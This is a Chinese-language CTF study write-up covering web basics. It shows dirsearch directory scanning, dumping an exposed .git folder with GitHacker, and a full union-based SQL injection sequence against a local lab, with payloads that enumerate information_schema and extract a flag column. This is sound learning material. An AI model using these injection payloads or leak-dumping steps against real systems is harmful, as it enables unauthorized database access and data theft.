第一章 web入门
举足轻重的信息搜集
信息搜集
dirsearch安装
cd /etc
git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
./dirsearch.py -u 127.0.0.1:80 -e*
扫描后,本地+绿色后缀直接打开得到flag。
粗心的小李
题目标明是git泄露,根据书直接上GitHacker(需下载python3)。
cd /etc
git clone https://github.com/WangYihang/GitHacker
cd GitHacker
sudo python3 GitHacker.py http://127.0.0.1:80/.git/
得到index.html文件,仔细看flag就在里面(只是没有flag这个关键词)。
拔牙给搞发烧了你敢信,我服了。
CTF中的SQL注入
SQL注入-1
这题根据书上来就直接绕晕了。
首先尝试?id=2-1,发现显示的是id=2时的页面,可能是字符型注入,再输入?id=2a,发现和id=2时的页面一样,印证了是字符型注入。接下来就是正常union注入流程了。
一、判断是否用’做字符串引号
?id=1’and 1=1 --+
正常显示证明有引号。
二、判断它所在的数据库有几列
?id=1’order by 3 --+
根据回文显示有3列,再试试把3改4,无回文,证明最大3列。
三、判断他显示的内容在数据库的第几列
?id=-1’ union select 1,2,3 --+
回文显示数据在第二列及第三列。
四、查找出当前用户权限
?id=-1’ union select 1,user(),3 --+
root权限,无需多言。
五、查找当前数据库
?id=-1’ union select 1,database(),3 --+
数据库为note
六、查找note的表名
?id=-1’ union select 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=‘note’ --+
分为两个表。
七 、查找fl4g及notes里的字段
?id=-1’ union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=‘fl4g’ --+
?id=-1’ union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=‘notes’ --+
不管notes里的,直接查fllllag。
八、获取flag
?id=-1’ union select 1,group_concat(fllllag),3 FROM fl4g --+
结束。
这题考察注入流程,一点点判断。确定注入类型后直接搜union注入流程走一遍就行了。
SQL注入-2
这题布置burpsuite与dvwa环境布置了好久,没有成功,暂时绕过,思路是用dvwa调试。